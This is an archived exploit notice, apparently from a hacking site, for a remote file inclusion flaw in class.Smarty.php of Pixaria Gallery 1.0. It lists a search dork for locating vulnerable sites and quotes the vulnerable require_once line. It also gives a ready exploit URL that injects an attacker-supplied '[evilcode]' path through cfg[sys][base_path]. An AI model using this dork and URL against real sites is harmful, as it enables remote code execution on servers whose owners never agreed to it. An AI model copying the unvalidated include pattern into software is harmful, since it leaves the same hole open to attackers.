AOH :: HP Unsorted P :: TB10411.HTM

Pixaria Gallery 1.0 (class.Smarty.php) Remote File Include Vulnerability



Pixaria Gallery 1.0 (class.Smarty.php) Remote File Include Vulnerability
Pixaria Gallery 1.0 (class.Smarty.php) Remote File Include Vulnerability



Pixaria Gallery 1.0 (class.Smarty.php) Remote File Include Vulnerability

-----------------------------------------------------------------------------------------
# scripts       : Pixaria Gallery 1.0
# Discovered By : irvian
# scripts site : http://pixaria.com/ 
# Thanks To     : #hitamputih #nyubicrew #patihack
# special To    : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz
# dork          : powered by Pixaria=99 Gallery
		  inurl:index.gallery.php?gid------------------------------------------------------------------------------------------
bug found: 

/resources/includes/class.Smarty.php

// Load the main Smarty class
require_once ($cfg['sys']['base_path'] . "resources/smarty/libs/Smarty.class.php");


Exploit: http://www.target.com/resources/includes/class.Smarty.php?cfg[sys][base_path]=[evilcode] 
         

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.